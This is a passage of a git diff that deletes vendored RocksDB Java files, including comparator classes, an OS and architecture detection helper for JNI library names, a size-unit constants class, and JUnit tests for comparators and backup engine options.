-        System.arraycopy(startBytes, 0, shortest, 0, diff_index + 1);
-        shortest[diff_index]++;
-        assert(ByteBuffer.wrap(shortest).compareTo(limit.data()) < 0);
-        return new String(shortest);
-      }
-    }
-
-    return null;
-  }
-
-  @Override
-  public String findShortSuccessor(final String key) {
-    final byte[] keyBytes = key.getBytes();
-
-    // Find first character that can be incremented
-    final int n = keyBytes.length;
-    for (int i = 0; i < n; i++) {
-      final byte byt = keyBytes[i];
-      if (byt != 0xff) {
-        final byte shortSuccessor[] = new byte[i + 1];
-        System.arraycopy(keyBytes, 0, shortSuccessor, 0, i + 1);
-        shortSuccessor[i]++;
-        return new String(shortSuccessor);
-      }
-    }
-    // *key is a run of 0xffs.  Leave it alone.
-
-    return null;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/Environment.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/Environment.java
deleted file mode 100644
index f84e14b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/Environment.java
+++ /dev/null
@@ -1,90 +0,0 @@
-package org.rocksdb.util;
-
-public class Environment {
-  private static String OS = System.getProperty("os.name").toLowerCase();
-  private static String ARCH = System.getProperty("os.arch").toLowerCase();
-
-  public static boolean isPowerPC() {
-    return ARCH.contains("ppc");
-  }
-
-  public static boolean isWindows() {
-    return (OS.contains("win"));
-  }
-
-  public static boolean isMac() {
-    return (OS.contains("mac"));
-  }
-
-  public static boolean isAix() {
-    return OS.contains("aix");
-  }
-  
-  public static boolean isUnix() {
-    return OS.contains("nix") ||
-        OS.contains("nux");
-  }
-
-  public static boolean isSolaris() {
-    return OS.contains("sunos");
-  }
-
-  public static boolean is64Bit() {
-    if (ARCH.indexOf("sparcv9") >= 0) {
-      return true;
-    }
-    return (ARCH.indexOf("64") > 0);
-  }
-
-  public static String getSharedLibraryName(final String name) {
-    return name + "jni";
-  }
-
-  public static String getSharedLibraryFileName(final String name) {
-    return appendLibOsSuffix("lib" + getSharedLibraryName(name), true);
-  }
-
-  public static String getJniLibraryName(final String name) {
-    if (isUnix()) {
-      final String arch = is64Bit() ? "64" : "32";
-      if(isPowerPC()) {
-        return String.format("%sjni-linux-%s", name, ARCH);
-      } else {
-        return String.format("%sjni-linux%s", name, arch);
-      }
-    } else if (isMac()) {
-      return String.format("%sjni-osx", name);
-    } else if (isAix() && is64Bit()) {
-      return String.format("%sjni-aix64", name);
-    } else if (isSolaris()) {
-      final String arch = is64Bit() ? "64" : "32";
-      return String.format("%sjni-solaris%s", name, arch);
-    } else if (isWindows() && is64Bit()) {
-      return String.format("%sjni-win64", name);
-    }
-
-    throw new UnsupportedOperationException(String.format("Cannot determine JNI library name for ARCH='%s' OS='%s' name='%s'", ARCH, OS, name));
-  }
-
-  public static String getJniLibraryFileName(final String name) {
-    return appendLibOsSuffix("lib" + getJniLibraryName(name), false);
-  }
-
-  private static String appendLibOsSuffix(final String libraryFileName, final boolean shared) {
-    if (isUnix() || isAix() || isSolaris()) {
-      return libraryFileName + ".so";
-    } else if (isMac()) {
-      return libraryFileName + (shared ? ".dylib" : ".jnilib");
-    } else if (isWindows()) {
-      return libraryFileName + ".dll";
-    }
-    throw new UnsupportedOperationException();
-  }
-
-  public static String getJniLibraryExtension() {
-    if (isWindows()) {
-      return ".dll";
-    }
-    return (isMac()) ? ".jnilib" : ".so";
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java
deleted file mode 100644
index 7fbac2f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java
+++ /dev/null
@@ -1,37 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.rocksdb.BuiltinComparator;
-import org.rocksdb.ComparatorOptions;
-import org.rocksdb.Slice;
-
-/**
- * This is a Java Native implementation of the C++
- * equivalent ReverseBytewiseComparatorImpl using {@link Slice}
- *
- * The performance of Comparators implemented in Java is always
- * less than their C++ counterparts due to the bridging overhead,
- * as such you likely don't want to use this apart from benchmarking
- * and you most likely instead wanted
- * {@link BuiltinComparator#REVERSE_BYTEWISE_COMPARATOR}
- */
-public class ReverseBytewiseComparator extends BytewiseComparator {
-
-  public ReverseBytewiseComparator(final ComparatorOptions copt) {
-    super(copt);
-  }
-
-  @Override
-  public String name() {
-    return "rocksdb.java.ReverseBytewiseComparator";
-  }
-
-  @Override
-  public int compare(final Slice a, final Slice b) {
-    return -super.compare(a, b);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/SizeUnit.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/SizeUnit.java
deleted file mode 100644
index 0f717e8..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/SizeUnit.java
+++ /dev/null
@@ -1,16 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-public class SizeUnit {
-  public static final long KB = 1024L;
-  public static final long MB = KB * KB;
-  public static final long GB = KB * MB;
-  public static final long TB = KB * GB;
-  public static final long PB = KB * TB;
-
-  private SizeUnit() {}
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/AbstractComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/AbstractComparatorTest.java
deleted file mode 100644
index 91a1e99..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/AbstractComparatorTest.java
+++ /dev/null
@@ -1,199 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.io.IOException;
-import java.nio.file.*;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.rocksdb.Types.byteToInt;
-import static org.rocksdb.Types.intToByte;
-
-/**
- * Abstract tests for both Comparator and DirectComparator
- */
-public abstract class AbstractComparatorTest {
-
-  /**
-   * Get a comparator which will expect Integer keys
-   * and determine an ascending order
-   *
-   * @return An integer ascending order key comparator
-   */
-  public abstract AbstractComparator getAscendingIntKeyComparator();
-
-  /**
-   * Test which stores random keys into the database
-   * using an @see getAscendingIntKeyComparator
-   * it then checks that these keys are read back in
-   * ascending order
-   *
-   * @param db_path A path where we can store database
-   *                files temporarily
-   *
-   * @throws java.io.IOException if IO error happens.
-   */
-  public void testRoundtrip(final Path db_path) throws IOException,
-      RocksDBException {
-    try (final AbstractComparator comparator = getAscendingIntKeyComparator();
-         final Options opt = new Options()
-             .setCreateIfMissing(true)
-             .setComparator(comparator)) {
-
-      // store 10,000 random integer keys
-      final int ITERATIONS = 10000;
-      try (final RocksDB db = RocksDB.open(opt, db_path.toString())) {
-        final Random random = new Random();
-        for (int i = 0; i < ITERATIONS; i++) {
-          final byte key[] = intToByte(random.nextInt());
-          // does key already exist (avoid duplicates)
-          if (i > 0 && db.get(key) != null) {
-            i--; // generate a different key
-          } else {
-            db.put(key, "value".getBytes());
-          }
-        }
-      }
-
-      // re-open db and read from start to end
-      // integer keys should be in ascending
-      // order as defined by SimpleIntComparator
-      try (final RocksDB db = RocksDB.open(opt, db_path.toString());
-           final RocksIterator it = db.newIterator()) {
-        it.seekToFirst();
-        int lastKey = Integer.MIN_VALUE;
-        int count = 0;
-        for (it.seekToFirst(); it.isValid(); it.next()) {
-          final int thisKey = byteToInt(it.key());
-          assertThat(thisKey).isGreaterThan(lastKey);
-          lastKey = thisKey;
-          count++;
-        }
-        assertThat(count).isEqualTo(ITERATIONS);
-      }
-    }
-  }
-
-  /**
-   * Test which stores random keys into a column family
-   * in the database
-   * using an @see getAscendingIntKeyComparator
-   * it then checks that these keys are read back in
-   * ascending order
-   *
-   * @param db_path A path where we can store database
-   *                files temporarily
-   *
-   * @throws java.io.IOException if IO error happens.
-   */
-  public void testRoundtripCf(final Path db_path) throws IOException,
-      RocksDBException {
-
-    try(final AbstractComparator comparator = getAscendingIntKeyComparator()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-          new ColumnFamilyDescriptor("new_cf".getBytes(),
-              new ColumnFamilyOptions().setComparator(comparator))
-      );
-
-      final List<ColumnFamilyHandle> cfHandles = new ArrayList<>();
-
-      try (final DBOptions opt = new DBOptions().
-          setCreateIfMissing(true).
-          setCreateMissingColumnFamilies(true)) {
-
-        // store 10,000 random integer keys
-        final int ITERATIONS = 10000;
-
-        try (final RocksDB db = RocksDB.open(opt, db_path.toString(),
-            cfDescriptors, cfHandles)) {
-          try {
-            assertThat(cfDescriptors.size()).isEqualTo(2);
-            assertThat(cfHandles.size()).isEqualTo(2);
-
-            final Random random = new Random();
-            for (int i = 0; i < ITERATIONS; i++) {
-              final byte key[] = intToByte(random.nextInt());
-              if (i > 0 && db.get(cfHandles.get(1), key) != null) {
-                // does key already exist (avoid duplicates)
-                i--; // generate a different key
-              } else {
-                db.put(cfHandles.get(1), key, "value".getBytes());
-              }
-            }
-          } finally {
-            for (final ColumnFamilyHandle handle : cfHandles) {
-              handle.close();
-            }
-          }
-          cfHandles.clear();
-        }
-
-        // re-open db and read from start to end
-        // integer keys should be in ascending
-        // order as defined by SimpleIntComparator
-        try (final RocksDB db = RocksDB.open(opt, db_path.toString(),
-            cfDescriptors, cfHandles);
-             final RocksIterator it = db.newIterator(cfHandles.get(1))) {
-          try {
-            assertThat(cfDescriptors.size()).isEqualTo(2);
-            assertThat(cfHandles.size()).isEqualTo(2);
-
-            it.seekToFirst();
-            int lastKey = Integer.MIN_VALUE;
-            int count = 0;
-            for (it.seekToFirst(); it.isValid(); it.next()) {
-              final int thisKey = byteToInt(it.key());
-              assertThat(thisKey).isGreaterThan(lastKey);
-              lastKey = thisKey;
-              count++;
-            }
-
-            assertThat(count).isEqualTo(ITERATIONS);
-
-          } finally {
-            for (final ColumnFamilyHandle handle : cfHandles) {
-              handle.close();
-            }
-          }
-          cfHandles.clear();
-        }
-      }
-    }
-  }
-
-  /**
-   * Compares integer keys
-   * so that they are in ascending order
-   *
-   * @param a 4-bytes representing an integer key
-   * @param b 4-bytes representing an integer key
-   *
-   * @return negative if a &lt; b, 0 if a == b, positive otherwise
-   */
-  protected final int compareIntKeys(final byte[] a, final byte[] b) {
-
-    final int iA = byteToInt(a);
-    final int iB = byteToInt(b);
-
-    // protect against int key calculation overflow
-    final double diff = (double)iA - iB;
-    final int result;
-    if (diff < Integer.MIN_VALUE) {
-      result = Integer.MIN_VALUE;
-    } else if(diff > Integer.MAX_VALUE) {
-      result = Integer.MAX_VALUE;
-    } else {
-      result = (int)diff;
-    }
-
-    return result;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupEngineTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupEngineTest.java
deleted file mode 100644
index 1caae50..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupEngineTest.java
+++ /dev/null
@@ -1,240 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class BackupEngineTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Rule
-  public TemporaryFolder backupFolder = new TemporaryFolder();
-
-  @Test
-  public void backupDb() throws RocksDBException {
-    // Open empty database.
-    try(final Options opt = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-
-      // Fill database with some test values
-      prepareDatabase(db);
-
-      // Create two backups
-      try(final BackupableDBOptions bopt = new BackupableDBOptions(
-          backupFolder.getRoot().getAbsolutePath());
-          final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-        be.createNewBackup(db, false);
-        be.createNewBackup(db, true);
-        verifyNumberOfValidBackups(be, 2);
-      }
-    }
-  }
-
-  @Test
-  public void deleteBackup() throws RocksDBException {
-    // Open empty database.
-    try(final Options opt = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-      // Fill database with some test values
-      prepareDatabase(db);
-      // Create two backups
-      try(final BackupableDBOptions bopt = new BackupableDBOptions(
-          backupFolder.getRoot().getAbsolutePath());
-          final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-        be.createNewBackup(db, false);
-        be.createNewBackup(db, true);
-        final List<BackupInfo> backupInfo =
-            verifyNumberOfValidBackups(be, 2);
-        // Delete the first backup
-        be.deleteBackup(backupInfo.get(0).backupId());
-        final List<BackupInfo> newBackupInfo =
-            verifyNumberOfValidBackups(be, 1);
-
-        // The second backup must remain.
-        assertThat(newBackupInfo.get(0).backupId()).
-            isEqualTo(backupInfo.get(1).backupId());
-      }
-    }
-  }
-
-  @Test
-  public void purgeOldBackups() throws RocksDBException {
-    // Open empty database.
-    try(final Options opt = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-      // Fill database with some test values
-      prepareDatabase(db);
-      // Create four backups
-      try(final BackupableDBOptions bopt = new BackupableDBOptions(
-          backupFolder.getRoot().getAbsolutePath());
-          final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-        be.createNewBackup(db, false);
-        be.createNewBackup(db, true);
-        be.createNewBackup(db, true);
-        be.createNewBackup(db, true);
-        final List<BackupInfo> backupInfo =
-            verifyNumberOfValidBackups(be, 4);
-        // Delete everything except the latest backup
-        be.purgeOldBackups(1);
-        final List<BackupInfo> newBackupInfo =
-            verifyNumberOfValidBackups(be, 1);
-        // The latest backup must remain.
-        assertThat(newBackupInfo.get(0).backupId()).
-            isEqualTo(backupInfo.get(3).backupId());
-      }
-    }
-  }
-
-  @Test
-  public void restoreLatestBackup() throws RocksDBException {
-    try(final Options opt = new Options().setCreateIfMissing(true)) {
-      // Open empty database.
-      RocksDB db = null;
-      try {
-        db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath());
-        // Fill database with some test values
-        prepareDatabase(db);
-
-        try (final BackupableDBOptions bopt = new BackupableDBOptions(
-            backupFolder.getRoot().getAbsolutePath());
-             final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 1);
-          db.put("key1".getBytes(), "valueV2".getBytes());
-          db.put("key2".getBytes(), "valueV2".getBytes());
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 2);
-          db.put("key1".getBytes(), "valueV3".getBytes());
-          db.put("key2".getBytes(), "valueV3".getBytes());
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V3");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V3");
-
-          db.close();
-          db = null;
-
-          verifyNumberOfValidBackups(be, 2);
-          // restore db from latest backup
-          try(final RestoreOptions ropts = new RestoreOptions(false)) {
-            be.restoreDbFromLatestBackup(dbFolder.getRoot().getAbsolutePath(),
-                dbFolder.getRoot().getAbsolutePath(), ropts);
-          }
-
-          // Open database again.
-          db = RocksDB.open(opt, dbFolder.getRoot().getAbsolutePath());
-
-          // Values must have suffix V2 because of restoring latest backup.
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V2");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V2");
-        }
-      } finally {
-        if(db != null) {
-          db.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void restoreFromBackup()
-      throws RocksDBException {
-    try(final Options opt = new Options().setCreateIfMissing(true)) {
-      RocksDB db = null;
-      try {
-        // Open empty database.
-        db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath());
-        // Fill database with some test values
-        prepareDatabase(db);
-        try (final BackupableDBOptions bopt = new BackupableDBOptions(
-            backupFolder.getRoot().getAbsolutePath());
-             final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 1);
-          db.put("key1".getBytes(), "valueV2".getBytes());
-          db.put("key2".getBytes(), "valueV2".getBytes());
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 2);
-          db.put("key1".getBytes(), "valueV3".getBytes());
-          db.put("key2".getBytes(), "valueV3".getBytes());
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V3");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V3");
-
-          //close the database
-          db.close();
-          db = null;
-
-          //restore the backup
-          final List<BackupInfo> backupInfo = verifyNumberOfValidBackups(be, 2);
-          // restore db from first backup
-          be.restoreDbFromBackup(backupInfo.get(0).backupId(),
-              dbFolder.getRoot().getAbsolutePath(),
-              dbFolder.getRoot().getAbsolutePath(),
-              new RestoreOptions(false));
-          // Open database again.
-          db = RocksDB.open(opt,
-              dbFolder.getRoot().getAbsolutePath());
-          // Values must have suffix V2 because of restoring latest backup.
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V1");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V1");
-        }
-      } finally {
-        if(db != null) {
-          db.close();
-        }
-      }
-    }
-  }
-
-  /**
-   * Verify backups.
-   *
-   * @param be {@link BackupEngine} instance.
-   * @param expectedNumberOfBackups numerical value
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  private List<BackupInfo> verifyNumberOfValidBackups(final BackupEngine be,
-      final int expectedNumberOfBackups) throws RocksDBException {
-    // Verify that backups exist
-    assertThat(be.getCorruptedBackups().length).
-        isEqualTo(0);
-    be.garbageCollect();
-    final List<BackupInfo> backupInfo = be.getBackupInfo();
-    assertThat(backupInfo.size()).
-        isEqualTo(expectedNumberOfBackups);
-    return backupInfo;
-  }
-
-  /**
-   * Fill database with some test values.
-   *
-   * @param db {@link RocksDB} instance.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  private void prepareDatabase(final RocksDB db)
-      throws RocksDBException {
-    db.put("key1".getBytes(), "valueV1".getBytes());
-    db.put("key2".getBytes(), "valueV1".getBytes());
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java
deleted file mode 100644
index c223014..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java
+++ /dev/null
@@ -1,351 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-import java.util.Random;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.ExpectedException;
-
-public class BackupableDBOptionsTest {
-
-  private final static String ARBITRARY_PATH =
-      System.getProperty("java.io.tmpdir");
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public ExpectedException exception = ExpectedException.none();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void backupDir() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupDir()).
-          isEqualTo(ARBITRARY_PATH);
-    }
-  }
-
-  @Test
-  public void env() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupEnv()).
-          isNull();
-
-      try(final Env env = new RocksMemEnv()) {
-        backupableDBOptions.setBackupEnv(env);
-        assertThat(backupableDBOptions.backupEnv())
-            .isEqualTo(env);
-      }
-    }
-  }
-
-  @Test
-  public void shareTableFiles() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setShareTableFiles(value);
-      assertThat(backupableDBOptions.shareTableFiles()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void infoLog() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.infoLog()).
-          isNull();
-
-      try(final Options options = new Options();
-          final Logger logger = new Logger(options){
-            @Override
-            protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-
-            }
-          }) {
-        backupableDBOptions.setInfoLog(logger);
-        assertThat(backupableDBOptions.infoLog())
-            .isEqualTo(logger);
-      }
-    }
-  }
-
-  @Test
-  public void sync() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setSync(value);
-      assertThat(backupableDBOptions.sync()).isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void destroyOldData() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH);) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setDestroyOldData(value);
-      assertThat(backupableDBOptions.destroyOldData()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void backupLogFiles() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setBackupLogFiles(value);
-      assertThat(backupableDBOptions.backupLogFiles()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void backupRateLimit() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final long value = Math.abs(rand.nextLong());
-      backupableDBOptions.setBackupRateLimit(value);
-      assertThat(backupableDBOptions.backupRateLimit()).
-          isEqualTo(value);
-      // negative will be mapped to 0
-      backupableDBOptions.setBackupRateLimit(-1);
-      assertThat(backupableDBOptions.backupRateLimit()).
-          isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void backupRateLimiter() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupEnv()).
-          isNull();
-
-      try(final RateLimiter backupRateLimiter =
-              new RateLimiter(999)) {
-        backupableDBOptions.setBackupRateLimiter(backupRateLimiter);
-        assertThat(backupableDBOptions.backupRateLimiter())
-            .isEqualTo(backupRateLimiter);
-      }
-    }
-  }
-
-  @Test
-  public void restoreRateLimit() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final long value = Math.abs(rand.nextLong());
-      backupableDBOptions.setRestoreRateLimit(value);
-      assertThat(backupableDBOptions.restoreRateLimit()).
-          isEqualTo(value);
-      // negative will be mapped to 0
-      backupableDBOptions.setRestoreRateLimit(-1);
-      assertThat(backupableDBOptions.restoreRateLimit()).
-          isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void restoreRateLimiter() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupEnv()).
-          isNull();
-
-      try(final RateLimiter restoreRateLimiter =
-              new RateLimiter(911)) {
-        backupableDBOptions.setRestoreRateLimiter(restoreRateLimiter);
-        assertThat(backupableDBOptions.restoreRateLimiter())
-            .isEqualTo(restoreRateLimiter);
-      }
-    }
-  }
-
-  @Test
-  public void shareFilesWithChecksum() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      boolean value = rand.nextBoolean();
-      backupableDBOptions.setShareFilesWithChecksum(value);
-      assertThat(backupableDBOptions.shareFilesWithChecksum()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void maxBackgroundOperations() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final int value = rand.nextInt();
-      backupableDBOptions.setMaxBackgroundOperations(value);
-      assertThat(backupableDBOptions.maxBackgroundOperations()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void callbackTriggerIntervalSize() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final long value = rand.nextLong();
-      backupableDBOptions.setCallbackTriggerIntervalSize(value);
-      assertThat(backupableDBOptions.callbackTriggerIntervalSize()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void failBackupDirIsNull() {
-    exception.expect(IllegalArgumentException.class);
-    try (final BackupableDBOptions opts = new BackupableDBOptions(null)) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void failBackupDirIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.backupDir();
-    }
-  }
-
-  @Test
-  public void failSetShareTableFilesIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setShareTableFiles(true);
-    }
-  }
-
-  @Test
-  public void failShareTableFilesIfDisposed() {
-    try (BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.shareTableFiles();
-    }
-  }
-
-  @Test
-  public void failSetSyncIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setSync(true);
-    }
-  }
-
-  @Test
-  public void failSyncIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.sync();
-    }
-  }
-
-  @Test
-  public void failSetDestroyOldDataIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setDestroyOldData(true);
-    }
-  }
-
-  @Test
-  public void failDestroyOldDataIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.destroyOldData();
-    }
-  }
-
-  @Test
-  public void failSetBackupLogFilesIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setBackupLogFiles(true);
-    }
-  }
-
-  @Test
-  public void failBackupLogFilesIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.backupLogFiles();
-    }
-  }
-
-  @Test
-  public void failSetBackupRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setBackupRateLimit(1);
-    }
-  }
-
-  @Test
-  public void failBackupRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.backupRateLimit();
-    }
-  }
-
-  @Test
-  public void failSetRestoreRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setRestoreRateLimit(1);
-    }
-  }
-
-  @Test
-  public void failRestoreRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.restoreRateLimit();
-    }
-  }
-
-  @Test
-  public void failSetShareFilesWithChecksumIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setShareFilesWithChecksum(true);
-    }
-  }
-
-  @Test
-  public void failShareFilesWithChecksumIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.shareFilesWithChecksum();
-    }
-  }
-
-  private BackupableDBOptions setupUninitializedBackupableDBOptions(
-      ExpectedException exception) {
-    final BackupableDBOptions backupableDBOptions =
-        new BackupableDBOptions(ARBITRARY_PATH);
-    backupableDBOptions.close();
-    exception.expect(AssertionError.class);
-    return backupableDBOptions;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java
deleted file mode 100644
index 8edc8b8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java
+++ /dev/null
@@ -1,171 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class BlockBasedTableConfigTest {
-
-  @ClassRule
